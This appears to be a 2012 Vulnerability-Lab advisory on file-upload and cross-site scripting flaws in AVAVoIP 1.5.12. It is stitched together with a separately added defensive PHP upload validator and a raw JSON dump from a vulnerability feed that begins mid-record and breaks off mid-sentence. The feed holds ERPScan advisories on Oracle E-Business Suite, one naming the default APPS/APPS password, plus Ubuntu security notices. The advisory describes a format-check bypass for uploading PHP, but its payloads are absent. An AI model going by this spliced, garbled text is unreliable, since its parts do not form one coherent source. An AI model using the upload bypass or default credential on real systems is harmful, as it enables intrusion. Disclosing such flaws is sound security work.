Title:
AVAVoIP v1.5.12 - Multiple Web Vulnerabilities
Introduction:
Designed from the ground up to empower VoIP and to meet the needs of the changing business environment, the
AVA VoIP platform provides best in class features and carrier performance at competitive cost so you can spend
more time on strategic initiatives and less time on technical issues and downtime. Powerful CDR Mediation,
Pricing, Rating, Billing, Reporting and Routing engines enable providers to meet the challenges they face every day.
The AVA VoIP package supports all the traditional telecom business models such as: prepaid and postpaid wholesale VoIP,
prepaid and postpaid retail VoIP, calling cards, callback, call shop, Internet cafe, hotels, etc. In addition our team
of experienced engineers can address and custom tailor updates or platform add-ons as requested by our clients. Avangard
Solutions, Inc. provides cost-effective, customized IT solutions to large and mid-sized organizations worldwide. With
experience in the latest, state of the art technology trends, our expertise spans a wide variety of subject matters in
the areas of Pricing and Rating, Billing, BSS, OSS, CRM, ERP, SRM and e-commerce solutions. We offer our strategic
expertise backed with years of experience in communications protocols, VoIP, Triple Play and converged solutions.
(Copy of the Vendor Homepage: http://avavoip.com/ )
Abstract:
The Vulnerability Laboratory Research Team discovered multiple Web Vulnerabilities in AVAVoIP Communication Application 1.5.12.
Report-Timeline:
2012-06-09: Public or Non-Public Disclosure
Status:
Published
Exploitation-Technique:
Remote
Severity:
High
Details:
1.1
An arbitrary file upload vulnerability is detected in AVA's AVAVoIP Communication Application v1.5.12.
An attacker can upload a PHP file to the website and access this PHP file to control the entire site.
The vulnerability can only be exploited with a privileged application user account. The bug is located
in the FX rates > upload FX rates application function in the fx_rates_upload.php file.
Vulnerable Section(s):
[+] FX rates > upload FX rates
Vulnerable File(s):
[+] fx_rates_upload.php
1.2
Multiple persistent input validation vulnerabilities are detected in AVA's AVAVoIP Communication Application v1.5.12.
The bugs allow remote attackers to implement/inject malicious script code on the application side (persistent).
Successful exploitation of the vulnerabilities can lead to session hijacking (manager/admin) or stable (persistent)
context manipulation. Exploitation requires low user interaction and a privileged user account. The persistent
vulnerabilities are located in multiple different files, in the bound parameters and in the affected output listings.
Vulnerable File(s):
[+] accountadd.php First Name
[+] agent_set.php
[+] batchadd.php
[+] carrier_list.php
[+] routeset_set.php
[+] tariff_add.php
[+] taxadd.php
Vulnerable Module(s):
[+] Accounts > Add > First Name
[+] Agents > Add Agents > Business Phone
[+] Rating & Billing > Update Batch > Batch Name
[+] Rating & Billing > Taxes & Localities > Taxes > Tax Name
[+] Routing > Carrers > Carrier ID > Add & Listing
[+] Routing > Route Sets > Add & Update > Route Set Name
[+] Routing > Tariffs > Update Name
1.3
Multiple non-persistent cross site scripting vulnerabilities are detected in AVA's AVAVoIP Communication Application v1.5.12.
The vulnerabilities allow remote attackers to hijack website customer, moderator & admin sessions with medium/high required
user interaction or a local low privileged user account. Successful exploitation results in account theft, phishing &
client-side context request manipulation.
Proof of Concept:
1.1
The file upload vulnerability can be exploited by privileged user accounts without required user interaction.
For demonstration or reproduce ...
The attacker can go to the vulnerable file which is located at FX rates > upload FX rates. The upload function in
the vulnerable page (fx_rates_upload.php) doesn't check the extension of the uploaded file. However, it checks the
format of the file via its own flag. Therefore, if the attacker uploads a PHP file like this
<?
echo "test";
?>
The attacker will get an error because the file does not satisfy the format the uploaded file should have, but if the
attacker uploads the following file ...
The file will be successfully uploaded. The attacker bypasses the format check of the upload function and
gets a working PHP file because the added data is commented out.
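A defensive counterpart to the upload flaw described in 1.1, added here as an example and not taken from the advisory or from the vendor's code: every line of the upload must match the rate-row format in full, and only the parsed values are written back to disk under a server-chosen .csv name. The three-field row format (COUNTRY,CCY,RATE), the function names, the size limit and the sample rows are assumptions made for this illustration.

```php
<?php
declare(strict_types=1);

// Assumed row format (not from the vendor's code): COUNTRY,CCY,RATE
// \A and \z anchor the pattern to the whole line, so a line that merely
// contains rate data (for example after a comment marker) does not match.
const FX_ROW = '/\A([A-Z][A-Z .-]{1,63}),([A-Z]{3}),(\d{1,9}(?:\.\d{1,6})?)\z/';
const FX_MAX_BYTES = 262144; // assumed upper bound for a rates file

/** Parse the upload strictly; throws on the first line that is not a rate row. */
function parse_fx_rates(string $raw): array
{
    if ($raw === '' || strlen($raw) > FX_MAX_BYTES) {
        throw new InvalidArgumentException('empty or oversized upload');
    }
    $rows = [];
    $lines = preg_split('/\r\n|\n|\r/', rtrim($raw, "\r\n"));
    foreach ($lines as $i => $line) {
        if (preg_match(FX_ROW, $line, $m) !== 1) {
            throw new InvalidArgumentException('line ' . ($i + 1) . ' is not a rate row');
        }
        $rows[] = [$m[1], $m[2], $m[3]];
    }
    return $rows;
}

/**
 * Write the parsed rows (never the uploaded bytes) to a directory outside the
 * web root, under a random name with a fixed .csv extension.
 */
function store_fx_rates(array $rows, string $dataDir): string
{
    $path = rtrim($dataDir, '/') . '/fx_' . bin2hex(random_bytes(16)) . '.csv';
    $fh = fopen($path, 'xb'); // 'x' refuses to overwrite an existing file
    if ($fh === false) {
        throw new RuntimeException('cannot create rates file');
    }
    foreach ($rows as $row) {
        fwrite($fh, implode(',', $row) . "\n");
    }
    fclose($fh);
    chmod($path, 0640);
    return $path;
}

/** Entry point for one element of $_FILES; the client-supplied name is ignored. */
function handle_fx_upload(array $file, string $dataDir): string
{
    $tmp = (string)($file['tmp_name'] ?? '');
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK || !is_uploaded_file($tmp)) {
        throw new InvalidArgumentException('upload failed');
    }
    $raw = file_get_contents($tmp, false, null, 0, FX_MAX_BYTES + 1);
    if ($raw === false) {
        throw new RuntimeException('cannot read upload');
    }
    return store_fx_rates(parse_fx_rates($raw), $dataDir);
}

// Command-line demonstration with constructed sample data.
if (PHP_SAPI === 'cli') {
    $samples = [
        'clean rates file'      => "EXAMPLELAND,EXL,1.2345\nSAMPLE ISLANDS,SMP,7.5\n",
        'row hidden in comment' => "<? //EXAMPLELAND,EXL,1.2345\n",
        'extra trailing field'  => "EXAMPLELAND,EXL,1.2345,extra\n",
    ];
    foreach ($samples as $label => $raw) {
        try {
            $rows = parse_fx_rates($raw);
            echo $label . ': accepted, ' . count($rows) . " rows\n";
        } catch (InvalidArgumentException $e) {
            echo $label . ': rejected (' . $e->getMessage() . ")\n";
        }
    }
}
```

Because the stored file is rebuilt from parsed fields and always ends in .csv, nothing the uploader controls reaches the file name or survives as executable content.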
1.2
The persistent script code injection vulnerabilities can be exploited by privileged user accounts with low required user
interaction. For demonstration or reproduce ...
1.3
The client side cross site scripting vulnerabilities can be exploited by remote attackers with medium or high required
user interaction. For demonstration or reproduce ...
Risk:
1.1
The security risk of the local file upload vulnerability is estimated as medium(+).
1.2
The security risk of the persistent input validation vulnerabilities is estimated as medium(+).
1.3
The security risk of the client side cross site scripting vulnerabilities is estimated as low(+).
Credits:
Vulnerability Laboratory [Research Team] - Ibrahim El-Sayed [the StOrM) (storm@vulnerability-lab.com)
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@vulnerability-lab.com)
Disclaimer:
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases
or trade with fraud/stolen material.
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed),
modify, use or edit our material contact (admin@vulnerability-lab.com or support@vulnerability-lab.com) to get a permission.
--
VULNERABILITY LABORATORY - RESEARCH TEAM
COMPANY: www.vulnerability-lab.com or www.vuln-lab.com
ADMIN MAIL: admin@vulnerability-lab.com
PHONE: 01776757259
VULNERABILITY INFORMATION\r\n\r\nClass: XML External Entity [CWE-611]\r\nImpact: information disclosure, DoS, SSRF, NTLM relay\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nCVE Name: CVE-2015-4851\r\nCVSS Information\r\nCVSS Base Score: 6.8 / 10\r\nAV : Access Vector (Related exploit range) Network (N)\r\nAC : Access Complexity (Required attack complexity) Medium (M)\r\nAu : Authentication (Level of authentication needed to exploit) None (N)\r\nC : Impact to Confidentiality Partial (P)\r\nI : Impact to Integrity Partial (P)\r\nA : Impact to Availability Partial (P)\r\n\r\n3. VULNERABILITY DESCRIPTION\r\n\r\n1) An attacker can read an arbitrary file on a server by sending a\r\ncorrect XML request with a crafted DTD and reading the response from\r\nthe service.\r\n2) An attacker can perform a DoS attack (for example, XML Entity Expansion).\r\n3) An SMB Relay attack is a type of Man-in-the-Middle attack where the\r\nattacker asks the victim to authenticate into a machine controlled by\r\nthe attacker, then relays the credentials to the target. The attacker\r\nforwards the authentication information both ways and gets access.\r\n\r\n4. VULNERABLE PACKAGES\r\n\r\nOracle E-Business Suite 12.1.3\r\n\r\nOther versions are probably affected too, but they were not checked.\r\n\r\n5. SOLUTIONS AND WORKAROUNDS\r\n\r\nInstall Oracle CPU October 2015\r\n\r\n6. AUTHOR\r\nNikita Kelesis, Ivan Chalykin, Alexey Tyurin (ERPScan)\r\n\r\n7. TECHNICAL DESCRIPTION\r\n\r\nVulnerable servlet:\r\n/OA_HTML/oramipp_lpr\r\n\r\n\r\n8. REPORT TIMELINE\r\n\r\nReported: 17.07.2015\r\nVendor response: 24.07.2015\r\nDate of Public Advisory: 20.10.2015\r\n\r\n9. REFERENCES\r\n\r\nhttp://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html\r\nhttp://erpscan.com/advisories/erpscan-15-030-oracle-e-business-suite-xxe-injection-vulnerability/\r\n\r\n10. 
ABOUT ERPScan Research\r\nThe company\u2019s expertise is based on the research subdivision of\r\nERPScan, which is engaged in vulnerability research and analysis of\r\ncritical enterprise applications. It has achieved multiple\r\nacknowledgments from the largest software vendors like SAP, Oracle,\r\nMicrosoft, IBM, VMware, HP for discovering more than 400\r\nvulnerabilities in their solutions (200 of them just in SAP!).\r\nERPScan researchers are proud to have exposed new types of\r\nvulnerabilities (TOP 10 Web Hacking Techniques 2012) and to be\r\nnominated for the best server-side vulnerability at BlackHat 2013.\r\nERPScan experts have been invited to speak, present, and train at 60+\r\nprime international security conferences in 25+ countries across the\r\ncontinents. These include BlackHat, RSA, HITB, and private SAP\r\ntrainings in several Fortune 2000 companies.\r\nERPScan researchers lead the project EAS-SEC, which is focused on\r\nenterprise application security research and awareness. They have\r\npublished 3 exhaustive annual award-winning surveys about SAP\r\nsecurity.\r\nERPScan experts have been interviewed by leading media resources and\r\nfeatured in specialized info-sec publications worldwide. These include\r\nReuters, Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading,\r\nHeise, and Chinabyte, to name a few.\r\nWe have highly qualified experts in staff with experience in many\r\ndifferent fields of security, from web applications and\r\nmobile/embedded to reverse engineering and ICS/SCADA systems,\r\naccumulating their experience to conduct the best SAP security\r\nresearch.\r\n\r\n\r\n11. ABOUT ERPScan\r\nERPScan is one of the most respected and credible Business Application\r\nSecurity providers. Founded in 2010, the company operates globally.\r\nNamed an Emerging vendor in Security by CRN and distinguished by more\r\nthan 25 other awards, ERPScan is the leading SAP SE partner in\r\ndiscovering and resolving security vulnerabilities. 
ERPScan\r\nconsultants work with SAP SE in Walldorf to improve the security of\r\ntheir latest solutions.\r\nERPScan\u2019s primary mission is to close the gap between technical and\r\nbusiness security. We provide solutions to secure ERP systems and\r\nbusiness-critical applications from both cyber attacks and internal\r\nfraud. Our clients are usually large enterprises, Fortune 2000\r\ncompanies, and managed service providers whose requirements are to\r\nactively monitor and manage the security of vast SAP landscapes on a\r\nglobal scale.\r\nOur flagship product is ERPScan Security Monitoring Suite for SAP.\r\nThis multi award-winning innovative software is the only solution on\r\nthe market certified by SAP SE covering all tiers of SAP security:\r\nvulnerability assessment, source code review, and Segregation of\r\nDuties.\r\nThe largest companies from diverse industries like oil and gas,\r\nbanking, retail, even nuclear power installations as well as\r\nconsulting companies have successfully deployed the software. ERPScan\r\nSecurity Monitoring Suite for SAP is specifically designed for\r\nenterprises to continuously monitor changes in multiple SAP systems.\r\nIt generates and analyzes trends in user friendly dashboards, manages\r\nrisks, tasks, and can export results to external systems. These\r\nfeatures enable central management of SAP system security with minimal\r\ntime and effort.\r\nWe follow the sun and function in two hubs located in the Netherlands\r\nand the US to operate local offices and partner network spanning 20+\r\ncountries around the globe. This enables monitoring cyber threats in\r\nreal time and providing agile customer support.\r\n\r\nAdress USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 
94301\r\nPhone: 650.798.5255\r\nTwitter: @erpscan\r\nScoop-it: Business Application Security\r\n\r\n", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:DOC:32655", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32655", "title": "[ERPSCAN-15-030] Oracle E-Business Suite - XXE injection Vulnerability", "type": "securityvulns", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:11:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-4854"], "description": "\r\n\r\n1. ADVISORY INFORMATION\r\n\r\nTitle: Oracle E-Business Suite Cross-site Scripting\r\nAdvisory ID: [ERPSCAN-15-027]\r\nAdvisory URL:http://erpscan.com/advisories/erpscan-15-027-oracle-e-business-suite-cross-site-scripting-vulnerability/\r\nDate published: 20.10.2015\r\nVendors contacted: Oracle\r\n\r\n2. VULNERABILITY INFORMATION\r\n\r\nClass: Cross-site Scripting\r\nImpact: impersonation, information disclosure\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nCVE Name: CVE-2015-4854\r\nCVSS Information\r\nCVSS Base Score: 4.3 / 10\r\nAV : Access Vector (Related exploit range) Network (N)\r\nAC : Access Complexity (Required attack complexity) Medium (M)\r\nAu : Authentication (Level of authentication needed to exploit) None (N)\r\nC : Impact to Confidentiality None (N)\r\nI : Impact to Integrity Partial (P)\r\nA : Impact to Availability None (N)\r\n\r\n3. VULNERABILITY DESCRIPTION\r\n\r\nAn anonymous attacker can create a special link that injects malicious JS code\r\n\r\n4. VULNERABLE PACKAGES\r\n\r\nOracle E-Business Suite 12.1.4\r\n\r\nOther versions are probably affected too, but they were not checked.\r\n\r\n5. SOLUTIONS AND WORKAROUNDS\r\n\r\nInstall Oracle CPU October 2015\r\n\r\n6. AUTHOR\r\nNikita Kelesis, Ivan Chalykin, Alexey Tyurin (ERPScan)\r\n\r\n7. 
TECHNICAL DESCRIPTION\r\n\r\nCfgOCIReturn servlet is vulnerable to Cross-site Scripting (XSS) due\r\nto lack of sanitizing the "domain" parameter.\r\n\r\n8. REPORT TIMELINE\r\n\r\nReported: 17.07.2015\r\nVendor response: 24.07.2015\r\nDate of Public Advisory: 20.10.2015\r\n\r\n9. REFERENCES\r\n\r\nhttp://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html\r\nhttp://erpscan.com/advisories/erpscan-15-027-oracle-e-business-suite-cross-site-scripting-vulnerability/\r\nhttp://erpscan.com/press-center/press-release/erpscan-took-a-closer-look-at-oracle-ebs-security-6-vulnerabilities-patched-in-recent-update/\r\n\r\n", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:DOC:32658", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32658", "title": "[ERPSCAN-15-027] Oracle E-Business Suite - Cross Site Scripting Vulnerability", "type": "securityvulns", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-08-31T11:11:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-7747"], "description": "\r\n\r\n==========================================================================\r\nUbuntu Security Notice USN-2787-1\r\nOctober 28, 2015\r\n\r\naudiofile vulnerability\r\n==========================================================================\r\n\r\nA security issue affects these releases of Ubuntu and its derivatives:\r\n\r\n- Ubuntu 15.10\r\n- Ubuntu 15.04\r\n- Ubuntu 14.04 LTS\r\n- Ubuntu 12.04 LTS\r\n\r\nSummary:\r\n\r\naudiofile could be made to crash or run programs as your login if it\r\nopened a specially crafted file.\r\n\r\nSoftware Description:\r\n- audiofile: Open-source version of the SGI audiofile library\r\n\r\nDetails:\r\n\r\nFabrizio Gennari 
discovered that audiofile incorrectly handled changing\r\nboth the sample format and the number of channels. If a user or automated\r\nsystem were tricked into processing a specially crafted file, audiofile\r\ncould be made to crash, leading to a denial of service, or possibly execute\r\narbitrary code.\r\n\r\nUpdate instructions:\r\n\r\nThe problem can be corrected by updating your system to the following\r\npackage versions:\r\n\r\nUbuntu 15.10:\r\n libaudiofile1 0.3.6-2ubuntu0.15.10.1\r\n\r\nUbuntu 15.04:\r\n libaudiofile1 0.3.6-2ubuntu0.15.04.1\r\n\r\nUbuntu 14.04 LTS:\r\n libaudiofile1 0.3.6-2ubuntu0.14.04.1\r\n\r\nUbuntu 12.04 LTS:\r\n libaudiofile1 0.3.3-2ubuntu0.1\r\n\r\nIn general, a standard system update will make all the necessary changes.\r\n\r\nReferences:\r\n http://www.ubuntu.com/usn/usn-2787-1\r\n CVE-2015-7747\r\n\r\nPackage Information:\r\n https://launchpad.net/ubuntu/+source/audiofile/0.3.6-2ubuntu0.15.10.1\r\n https://launchpad.net/ubuntu/+source/audiofile/0.3.6-2ubuntu0.15.04.1\r\n https://launchpad.net/ubuntu/+source/audiofile/0.3.6-2ubuntu0.14.04.1\r\n https://launchpad.net/ubuntu/+source/audiofile/0.3.3-2ubuntu0.1\r\n\r\n\r\n\r\n\r\n-- \r\nubuntu-security-announce mailing list\r\nubuntu-security-announce@lists.ubuntu.com\r\nModify settings or unsubscribe at: https://lists.ubuntu.com/mailman/listinfo/ubuntu-security-announce\r\n\r\n", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:DOC:32652", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32652", "title": "[USN-2787-1] audiofile vulnerability", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:11:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-4846"], "description": "\r\n\r\n1. 
ADVISORY INFORMATION\r\n\r\nTitle: Oracle E-Business Suite SQL injection\r\nAdvisory ID: [ERPSCAN-15-026]\r\nAdvisory URL: http://erpscan.com/advisories/erpscan-15-026-oracle-e-business-suite-sql-injection-vulnerability/\r\nDate published: 20.10.2015\r\nVendors contacted: Oracle\r\n\r\n2. VULNERABILITY INFORMATION\r\n\r\nClass: SQL injection\r\nImpact: SQL injection, RCE\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nCVE Name: CVE-2015-4846\r\nCVSS Information\r\nCVSS Base Score: 3.6 / 10\r\nAV : Access Vector (Related exploit range) Network (N)\r\nAC : Access Complexity (Required attack complexity) High (H)\r\nAu : Authentication (Level of authentication needed to exploit) Single (S)\r\nC : Impact to Confidentiality Partial (P)\r\nI : Impact to Integrity Partial (P)\r\nA : Impact to Availability None (N)\r\n\r\n3. VULNERABILITY DESCRIPTION\r\n\r\nThe problem is caused by an SQL injection vulnerability. The code\r\ncomprises an SQL statement that contains strings that can be altered\r\nby an attacker. The manipulated SQL statement can then be used to\r\nretrieve additional data from the database or to modify the data.\r\n\r\n4. VULNERABLE PACKAGES\r\n\r\nOracle E-Business Suite 12.1.3, 12.1.4\r\n\r\nOther versions are probably affected too, but they were not checked.\r\n\r\n5. SOLUTIONS AND WORKAROUNDS\r\n\r\nInstall Oracle CPU October 2015\r\n\r\n6. AUTHOR\r\nNikita Kelesis, Ivan Chalykin, Alexey Tyurin, Egor Karbutov (ERPScan)\r\n\r\n7. TECHNICAL DESCRIPTION\r\n\r\nOne of SQL extensions (afamexts.sql) does not filter user input values\r\nwhich may lead to SQL injection. The only defense mechanism is a\r\npassword for APPS. If an attacker knows the password (for example,\r\ndefault password APPS/APPS), he will be able to exploit SQL injection\r\nwith high privilege.\r\n\r\n\r\n8. REPORT TIMELINE\r\n\r\nReported: 17.07.2015\r\nVendor response: 24.07.2015\r\nDate of Public Advisory: 20.10.2015\r\n\r\n9. 
REFERENCES\r\n\r\nhttp://www.oracle.com/technetwork/topics/security/cpuoct2015-2367953.html\r\nhttp://erpscan.com/advisories/erpscan-15-026-oracle-e-business-suite-sql-injection-vulnerability/\r\nhttp://erpscan.com/press-center/press-release/erpscan-took-a-closer-look-at-oracle-ebs-security-6-vulnerabilities-patched-in-recent-update/\r\n\r\n", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:DOC:32657", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32657", "title": "[ERPSCAN-15-026] Oracle E-Business Suite - SQL injection Vulnerability", "type": "securityvulns", "cvss": {"score": 3.6, "vector": "AV:NETWORK/AC:HIGH/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-08-31T11:11:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-7803", "CVE-2015-7804"], "description": "\r\n\r\n==========================================================================\r\nUbuntu Security Notice USN-2786-1\r\nOctober 28, 2015\r\n\r\nphp5 vulnerabilities\r\n==========================================================================\r\n\r\nA security issue affects these releases of Ubuntu and its derivatives:\r\n\r\n- Ubuntu 15.10\r\n- Ubuntu 15.04\r\n- Ubuntu 14.04 LTS\r\n- Ubuntu 12.04 LTS\r\n\r\nSummary:\r\n\r\nPHP could be made to crash if it processed a specially crafted file.\r\n\r\nSoftware Description:\r\n- php5: HTML-embedded scripting language interpreter\r\n\r\nDetails:\r\n\r\nIt was discovered that the PHP phar extension incorrectly handled certain\r\nfiles. A remote attacker could use this issue to cause PHP to crash,\r\nresulting in a denial of service. 
(CVE-2015-7803, CVE-2015-7804)\r\n\r\nUpdate instructions:\r\n\r\nThe problem can be corrected by updating your system to the following\r\npackage versions:\r\n\r\nUbuntu 15.10:\r\n libapache2-mod-php5 5.6.11+dfsg-1ubuntu3.1\r\n php5-cgi 5.6.11+dfsg-1ubuntu3.1\r\n php5-cli 5.6.11+dfsg-1ubuntu3.1\r\n php5-fpm 5.6.11+dfsg-1ubuntu3.1\r\n\r\nUbuntu 15.04:\r\n libapache2-mod-php5 5.6.4+dfsg-4ubuntu6.4\r\n php5-cgi 5.6.4+dfsg-4ubuntu6.4\r\n php5-cli 5.6.4+dfsg-4ubuntu6.4\r\n php5-fpm 5.6.4+dfsg-4ubuntu6.4\r\n\r\nUbuntu 14.04 LTS:\r\n libapache2-mod-php5 5.5.9+dfsg-1ubuntu4.14\r\n php5-cgi 5.5.9+dfsg-1ubuntu4.14\r\n php5-cli 5.5.9+dfsg-1ubuntu4.14\r\n php5-fpm 5.5.9+dfsg-1ubuntu4.14\r\n\r\nUbuntu 12.04 LTS:\r\n libapache2-mod-php5 5.3.10-1ubuntu3.21\r\n php5-cgi 5.3.10-1ubuntu3.21\r\n php5-cli 5.3.10-1ubuntu3.21\r\n php5-fpm 5.3.10-1ubuntu3.21\r\n\r\nIn general, a standard system update will make all the necessary changes.\r\n\r\nReferences:\r\n http://www.ubuntu.com/usn/usn-2786-1\r\n CVE-2015-7803, CVE-2015-7804\r\n\r\nPackage Information:\r\n https://launchpad.net/ubuntu/+source/php5/5.6.11+dfsg-1ubuntu3.1\r\n https://launchpad.net/ubuntu/+source/php5/5.6.4+dfsg-4ubuntu6.4\r\n https://launchpad.net/ubuntu/+source/php5/5.5.9+dfsg-1ubuntu4.14\r\n https://launchpad.net/ubuntu/+source/php5/5.3.10-1ubuntu3.21\r\n\r\n\r\n\r\n\r\n-- \r\nubuntu-security-announce mailing list\r\nubuntu-security-announce@lists.ubuntu.com\r\nModify settings or unsubscribe at: https://lists.ubuntu.com/mailman/listinfo/ubuntu-security-announce\r\n\r\n", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:DOC:32651", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32651", "title": "[USN-2786-1] PHP vulnerabilities", "type": "securityvulns", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:03", "bulletinFamily": "software", "cvelist": ["CVE-2015-4894", 
"CVE-2015-4000", "CVE-2015-4851", "CVE-2015-4895", "CVE-2015-4905", "CVE-2015-4866", "CVE-2015-4832", "CVE-2015-4822", "CVE-2015-4830", "CVE-2015-4804", "CVE-2015-4816", "CVE-2015-0235", "CVE-2015-1793", "CVE-2015-4793", "CVE-2015-4863", "CVE-2015-4913", "CVE-2015-4892", "CVE-2014-0191", "CVE-2015-4796", "CVE-2015-4864", "CVE-2015-4794", "CVE-2015-4887", "CVE-2015-2642", "CVE-2015-4860", "CVE-2015-4868", "CVE-1999-0377", "CVE-2015-4820", "CVE-2015-4903", "CVE-2015-0286", "CVE-2015-4906", "CVE-2015-4843", "CVE-2015-4842", "CVE-2015-4910", "CVE-2015-4872", "CVE-2015-4846", "CVE-2014-3576", "CVE-2015-4876", "CVE-2014-3571", "CVE-2015-4883", "CVE-2014-7940", "CVE-2015-4858", "CVE-2015-4802", "CVE-2015-4882", "CVE-2015-4801", "CVE-2015-4878", "CVE-2015-4799", "CVE-2015-4811", "CVE-2015-4834", "CVE-2015-4762", "CVE-2015-4815", "CVE-2015-4812", "CVE-2015-4839", "CVE-2015-4798", "CVE-2015-4891", "CVE-2015-4734", "CVE-2015-4899", "CVE-2015-4865", "CVE-2015-4915", "CVE-2015-4871", "CVE-2015-4800", "CVE-2015-4869", "CVE-2015-4828", "CVE-2015-4803", "CVE-2015-4875", "CVE-2015-4902", "CVE-2015-4917", "CVE-2015-4909", "CVE-2015-4791", "CVE-2015-4805", "CVE-2015-4849", "CVE-2015-4879", "CVE-2015-4888", "CVE-2015-4838", "CVE-2015-4850", "CVE-2015-4806", "CVE-2015-4825", "CVE-2015-3144", "CVE-2015-4797", "CVE-2015-4792", "CVE-2015-4837", "CVE-2015-4904", "CVE-2015-4810", "CVE-2015-4827", "CVE-2014-0050", "CVE-2015-4817", "CVE-2015-4908", "CVE-2015-4912", "CVE-2015-4833", "CVE-2015-4847", "CVE-2015-4855", "CVE-2015-4848", "CVE-2015-4730", "CVE-2015-4819", "CVE-2015-4896", "CVE-2015-2633", "CVE-2015-4807", "CVE-2015-4901", "CVE-2015-4835", "CVE-2015-4873", "CVE-2015-4766", "CVE-2015-4795", "CVE-2015-4907", "CVE-2015-4859", "CVE-2015-1829", "CVE-2015-4898", "CVE-2015-4874", "CVE-2015-4836", "CVE-2015-4824", "CVE-2015-4900", "CVE-2015-4831", "CVE-2015-4861", "CVE-2015-4911", "CVE-2015-4886", "CVE-2015-2608", "CVE-2015-4809", "CVE-2015-4877", "CVE-2015-4844", "CVE-2015-4870", 
"CVE-2015-4881", "CVE-2015-4840", "CVE-2015-4856", "CVE-2015-4845", "CVE-2015-4914", "CVE-2015-4893", "CVE-2015-4916", "CVE-2015-4826", "CVE-2014-1569", "CVE-2015-4862", "CVE-2010-1622", "CVE-2015-4857", "CVE-2015-4890", "CVE-2015-4867", "CVE-2015-4884", "CVE-2015-4813", "CVE-2015-4841", "CVE-2015-4818", "CVE-2015-4880", "CVE-2015-1791", "CVE-2015-4823", "CVE-2015-4821"], "description": "Quarterly update closes 140 vulnerabilities in different applications.", "edition": 1, "modified": "2015-11-02T00:00:00", "published": "2015-11-02T00:00:00", "id": "SECURITYVULNS:VULN:14755", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14755", "title": "Oracle / Sun / PeopleSoft / MySQL multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:11:02", "bulletinFamily": "software", "cvelist": ["CVE-2015-1341"], "description": "\r\n\r\n==========================================================================\r\nUbuntu Security Notice USN-2782-1\r\nOctober 27, 2015\r\n\r\napport vulnerability\r\n==========================================================================\r\n\r\nA security issue affects these releases of Ubuntu and its derivatives:\r\n\r\n- Ubuntu 15.10\r\n- Ubuntu 15.04\r\n- Ubuntu 14.04 LTS\r\n- Ubuntu 12.04 LTS\r\n\r\nSummary:\r\n\r\nApport could be made to run programs as an administrator.\r\n\r\nSoftware Description:\r\n- apport: automatically generate crash reports for debugging\r\n\r\nDetails:\r\n\r\nGabriel Campana discovered that Apport incorrectly handled Python module\r\nimports. 
